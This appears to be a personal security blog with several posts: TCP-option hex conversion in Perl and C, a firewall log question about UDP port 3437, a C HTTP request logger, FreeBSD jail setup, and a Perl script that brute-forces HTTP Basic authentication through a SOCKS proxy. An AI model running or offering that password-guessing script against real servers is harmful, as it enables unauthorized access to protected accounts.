Thursday, April 22, 2010

Converting IP Options from binary to hex in Perl

A quick one-liner to convert TCP options from binary to hex.

use NetPacket::IP;
use NetPacket::TCP;

# $ip_obj is the NetPacket::IP object decoded earlier from the raw frame.
my $tcp_obj = NetPacket::TCP->decode($ip_obj->{data});
# unpack("N") reads only the first 4 bytes of the options field, so this
# renders the first 4 option bytes as 8 uppercase hex digits.
my $tcp_options = sprintf("%08X", unpack("N", $tcp_obj->{options}));
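As an added example that is not part of the original post, here is the same conversion in C, and it goes further than the one-liner: instead of stopping at the first four bytes it walks every option kind/length/data triple with bounds checks, which is what a packet parser on the defending side needs. The three option byte strings are constructed samples, not captured traffic.

```c
#include <stdint.h>
#include <string.h>
#define TCPOPT_EOL 0
#define TCPOPT_NOP 1
/* Constructed samples (not captured traffic): a lone MSS option, the 4-byte
 * case unpack("N") covers; a typical SYN set (MSS 1460, NOP, window scale 7,
 * SACK permitted, EOL); and an option whose length byte is below 2. */
static const uint8_t SAMPLE_MSS_OPTS[] = { 0x02, 0x04, 0x05, 0xB4 };
static const uint8_t SAMPLE_SYN_OPTS[] = { 0x02, 0x04, 0x05, 0xB4, 0x01,
    0x03, 0x03, 0x07, 0x04, 0x02, 0x00, 0x00 };
static const uint8_t SAMPLE_BAD_OPTS[] = { 0x02, 0x01 };
/* Uppercase hex of len bytes; out needs 2*len+1 bytes.
 * Returns the number of digits written, or -1 if out is too small. */
int hex_encode(const uint8_t *in, size_t len, char *out, size_t outlen)
{
    static const char digits[] = "0123456789ABCDEF";
    if (outlen < 2 * len + 1) return -1;
    for (size_t i = 0; i < len; i++) {
        out[2 * i]     = digits[in[i] >> 4];
        out[2 * i + 1] = digits[in[i] & 0x0F];
    }
    out[2 * len] = '\0';
    return (int)(2 * len);
}

/* Walk a TCP options field: kinds 0 (EOL) and 1 (NOP) are one byte, every
 * other option is kind, length (header included), data. Returns the option
 * count before EOL/end, or -1 for a length below 2 or past the buffer end. */
int tcp_options_walk(const uint8_t *opts, size_t len)
{
    size_t off = 0; int count = 0;
    while (off < len) {
        uint8_t kind = opts[off];
        if (kind == TCPOPT_EOL) break;
        if (kind == TCPOPT_NOP) { off++; count++; continue; }
        if (off + 1 >= len || opts[off + 1] < 2 || off + opts[off + 1] > len)
            return -1;                      /* lying length: reject, never trust */
        off += opts[off + 1];
        count++;
    }
    return count;
}

/* Hex of the MSS sample, the same value sprintf("%08X") yields for it. */
const char *sample_mss_hex(void)
{
    static char buf[2 * sizeof SAMPLE_MSS_OPTS + 1];
    hex_encode(SAMPLE_MSS_OPTS, sizeof SAMPLE_MSS_OPTS, buf, sizeof buf);
    return buf;
}
```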

Tuesday, November 10, 2009

UDP Port 3437

I have been seeing traffic like this on my firewall more and more. Does anyone know what it is?

99.101103 rule 19/0(match): block in on le0: 4.234.24.139.34247 > 192.168.100.7.3437: UDP, length 31
44.809854 rule 19/0(match): block in on le0: 24.197.158.193.36787 > 192.168.100.7.3437: UDP, length 35
19.922285 rule 19/0(match): block in on le0: 219.58.194.9.6346 > 192.168.100.7.3437: UDP, length 31
603.012552 rule 19/0(match): block in on le0: 75.83.84.151.24363 > 192.168.100.7.3437: UDP, length 31
509.641906 rule 19/0(match): block in on le0: 124.184.98.120.25705 > 192.168.100.7.3437: UDP, length 35

Tuesday, November 3, 2009

Listen for http connections with C


#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <arpa/inet.h>
#include <time.h>

#define PORT 30000
#define MAXBUFF 1024

/* Fixed reply for every request; the connection is closed right after it. */
static const char RESPONSE[] = "HTTP/1.1 404 Not Found\r\nConnection: close\r\n\r\n";

int wwwsock;

void myError(char *err) {
    perror(err);
    exit(1);
}

/* SIGINT handler: only async-signal-safe calls (close, _exit) belong here. */
void catchSig(int sig) {
    (void)sig;
    close(wwwsock);
    _exit(0);
}

int main(int argc, char *argv[]) {
    char timebuff[250];
    char *buffer;
    char *req;
    int newConnection, size;
    socklen_t clientAddr;
    ssize_t n;
    int optval = 1;
    time_t curtime;
    struct sockaddr_in serv_addr, cli_addr;

    (void)argc;
    (void)argv;

    (void)signal(SIGINT, catchSig);
    wwwsock = socket(AF_INET, SOCK_STREAM, 0);
    if (wwwsock < 0)
        myError("Socket Failed");

    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = INADDR_ANY;
    serv_addr.sin_port = htons(PORT);

    /* Allow a quick restart while old connections linger in TIME_WAIT. */
    setsockopt(wwwsock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);

    if (bind(wwwsock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        char error[64];
        snprintf(error, sizeof(error), "ERROR binding to port %d", PORT);
        myError(error);
    }

    if (listen(wwwsock, 5) < 0)
        myError("Listen Failed");

    buffer = malloc(MAXBUFF);
    req = malloc(MAXBUFF);
    if (buffer == NULL || req == NULL)
        myError("malloc Failed");

    while (1) {
        clientAddr = sizeof(cli_addr);
        newConnection = accept(wwwsock, (struct sockaddr *)&cli_addr, &clientAddr);
        if (newConnection < 0) {
            perror("accept");
            continue;
        }

        /* Read at most MAXBUFF-1 bytes so the buffer can always be
           NUL-terminated before any string function touches it. */
        memset(buffer, 0, MAXBUFF);
        n = recv(newConnection, buffer, MAXBUFF - 1, 0);
        if (n > 0) {
            buffer[n] = '\0';

            /* Log only the request line (everything up to the first newline). */
            if (strstr(buffer, "\n"))
                size = (int)(strlen(buffer) - strlen(strstr(buffer, "\n")));
            else
                size = 0;

            if (size > 0 && size < MAXBUFF - 1) {
                curtime = time(NULL);
                strftime(timebuff, sizeof(timebuff), "%c", localtime(&curtime));
                memcpy(req, buffer, size + 1);   /* request line plus its '\n' */
                req[size + 1] = '\0';
                printf("%s Client %s Requested %s", timebuff,
                       inet_ntoa(cli_addr.sin_addr), req);
                fflush(stdout);
            }

            /* Send the whole response, not just the status line. */
            send(newConnection, RESPONSE, sizeof(RESPONSE) - 1, 0);
        }

        close(newConnection);
    }

    close(wwwsock);
    free(buffer);
    free(req);
    return 0;
}

Sunday, February 15, 2009

Using Ports within a jail

To cut down on hard drive space usage, it is a good idea to share the ports directory from the main system with each jail. To secure it, the best idea is to mount /usr/ports read-only. The problem with having /usr/ports read-only is that the source can not be saved in /usr/ports/distfiles. To fix this we need to tell make to save the files elsewhere.

First edit /etc/fstab on the host and add (the host's /usr/ports is the source, the jail's /usr/ports is the mount point)
/usr/ports     PATH_TO_JAIL/usr/ports     nullfs     ro     0     0

Afterwards remount the file systems
mount -a

From within the jail create the directory /var/distfile and add
DISTDIR=/var/distfile and WRKDIRPREFIX=/var/distfiles to /etc/make.conf

All the files should be saved in /var/distfile from now on.

Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a Perl script that connects to a SOCKS proxy and tries every user and password in the given file against a protected web directory.

Modules needed: IO::Socket::Socks, MIME::Base64 and Getopt::Std

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC1945

use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;
use strict;

sub setOpts {

my $optString='s:p:f:d:i:P:';
my %opt;

my %configHash;

if($#ARGV >=11) {
getopts($optString,\%opt) or printError("Error on use $0 -s Proxy Server -d Protected File -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");
$configHash{'PServer'}=$opt{'s'} if(defined($opt{'s'}));
$configHash{'PPort'}=$opt{'p'} if(defined($opt{'p'}));
$configHash{'SIP'}=$opt{'i'} if(defined($opt{'i'}));
$configHash{'SPort'}=$opt{'P'} if(defined($opt{'P'}));
$configHash{'Sdir'}=$opt{'d'} if(defined($opt{'d'}));
$configHash{'IDfile'}=$opt{'f'} if(defined($opt{'f'}));

}
else {
printError("Error on use $0 -s Proxy Server -d Protected File -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");

}
return %configHash;
}

sub connectProxy {

my %configHash=@_;
$configHash{'sock'} = new IO::Socket::Socks(ProxyAddr=>$configHash{'PServer'},
ProxyPort=>$configHash{'PPort'},
ConnectAddr=>$configHash{'SIP'},
ConnectPort=>$configHash{'SPort'}) or die($!);
return %configHash;

}

sub printError {
my $errorMsg=$_[0];

print STDERR $errorMsg."\n";
exit();
}

sub checkFile {
my $fileName=$_[0];
printError("Please check file $fileName") if (! -f $fileName);

}

sub loadFile { my %configHash=@_;
open(USER,'<',$configHash{'IDfile'}) or printError("$! on file $configHash{'IDfile'}");

}


sub convUserPass{
my %configHash=@_;

$configHash{'encUserPass'}=encode_base64($configHash{'userInfo'});

return %configHash;

}

sub logIN {
my %configHash=@_;

while(<USER>) {
%configHash=connectProxy(%configHash);
$configHash{'userInfo'}=$_;

chomp($configHash{'userInfo'});
%configHash=convUserPass(%configHash);

my $socks=$configHash{'sock'};

print $socks "GET ".$configHash{'Sdir'}." HTTP/1.0\nHost: localhost\nAuthorization: Basic ".$configHash{'encUserPass'}."\n\n";

my $rsp;
$socks->read($rsp,15);

print $configHash{'userInfo'}."\n" if($rsp eq 'HTTP/1.1 200 OK');

}
}

sub closeProxy {
my %configHash=@_;

%configHash=connectProxy(%configHash)->close();
}

sub init {

my %configHash=setOpts();

checkFile($configHash{'IDfile'});
loadFile(%configHash);

logIN(%configHash);

}
init();

Saturday, October 13, 2007

FreeBSD jails the easy way

Jails are a nice easy way to isolate processes in FreeBSD. A jail makes it possible to run services in a virtual system, keeping them from interacting with the host system. More in-depth information can be found here.

Most if not all of the tutorials I have found have you recompile the system into a new directory, like the section6 wiki. This just seems overly complicated and hard to do, especially if you are in a pinch for time. While getting ready for a security competition, my partner Sean Jordan introduced me to the sysinstall method of making jails.

When making partitions I like to create a /jail partition to give the jails their own partition. I suggest making it at least 2 gigs for each jail. Also remember that all the files used by the users and services in the jail need to be on that partition, so size it accordingly. Each jail needs its own IP address; for my setup I am behind a router running NAT using the subnet 172.16.67.0/24.

Once FreeBSD is installed start making the needed directories.

  1. mkdir /jail/master
  2. mkdir /jail/master/usr/
  3. cp -R /bin/ /jail/master/bin
  4. cp -R /etc/ /jail/master/etc
  5. cp -R /lib/ /jail/master/lib
  6. cp -R /libexec/ /jail/master/libexec
  7. cp -R /sbin/ /jail/master/sbin
  8. cp -R /usr/share /jail/master/usr/share
  9. cp -R /usr/bin /jail/master/usr/bin
  10. cp -R /usr/sbin /jail/master/usr/sbin
  11. cp -R /usr/lib /jail/master/usr/lib
Once you have all the needed directories, chroot yourself into /jail/master and run sysinstall
  1. chroot /jail/master /bin/csh
  2. /usr/sbin/sysinstall
Once you are in choose
  1. Configure
  2. Distributions
  3. base
  4. (use ftp for media source)
  5. exit sysinstall
When you have the whole base distribution, exit the chroot
  1. exit
For demonstration purposes I'll create two jails, ssh and dns
  1. cp -R /jail/master/ /jail/ssh
  2. cp -R /jail/master/ /jail/dns
After the directories are made, edit /etc/rc.conf
  1. vi /etc/rc.conf
Add the following lines

  1. ifconfig_lnc0_alias0="172.16.67.47 netmask 255.255.255.0" #Add alias for your network
  2. ifconfig_lnc0_alias1="172.16.67.48 netmask 255.255.255.0" #Add alias for your network
  3. jail_enable="YES" # Set to NO to disable starting of any jails
  4. jail_list="ssh dns" # Space separated list of names of jails
  5. jail_set_hostname_allow="NO" # Allow root user in a jail to change its hostname
  6. jail_socket_unixiproute_only="YES" # Route only TCP/IP within a jail
  7. jail_ssh_rootdir="/jail/ssh"
  8. jail_ssh_hostname="ssh.bsd.local"
  9. jail_ssh_ip="172.16.67.47"
  10. jail_ssh_exec_start="/bin/sh /etc/rc"
  11. jail_ssh_devfs_enable="YES"
  12. jail_ssh_devfs_ruleset="devfsrules_jail"
  13. jail_dns_rootdir="/jail/dns"
  14. jail_dns_hostname="dns.bsd.local"
  15. jail_dns_ip="172.16.67.48"
  16. jail_dns_exec_start="/bin/sh /etc/rc"
  17. jail_dns_devfs_enable="YES"
  18. jail_dns_devfs_ruleset="devfsrules_jail"
Once the file is saved, start the jails and set up the NIC
  1. sh /etc/rc
Check that the jails are running by using jls
  • JID IP Address Hostname Path
  • 2 172.16.67.48 dns.bsd.local /jail/dns
  • 1 172.16.67.47 ssh.bsd.local /jail/ssh
Check that the interface is listening on the correct IP addresses by running ifconfig

  • lnc0: flags=108843 mtu 1500
  • inet6 fe80::20c:29ff:fe3c:1ce8%lnc0 prefixlen 64 scopeid 0x1
  • inet 172.16.67.46 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.47 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.48 netmask 0xffffff00 broadcast 172.16.67.255

To enter a jail use jexec
  1. jexec 1 /usr/local/bin/bash
Stopping jails can be done in two ways: /etc/rc.d/jail or pkill.
To stop all running jails run
  1. /etc/rc.d/jail stop
To stop just one jail run
  1. pkill -j JID
Once you are in the jail you can do whatever you would do on a normal system. If you want to use ICMP within the jail, set security.jail.allow_raw_sockets to 1 in /etc/sysctl.conf
  1. security.jail.allow_raw_sockets=1
On a final note, there are no users within the jail yet and the root user has no password, so be sure to set one using the passwd command.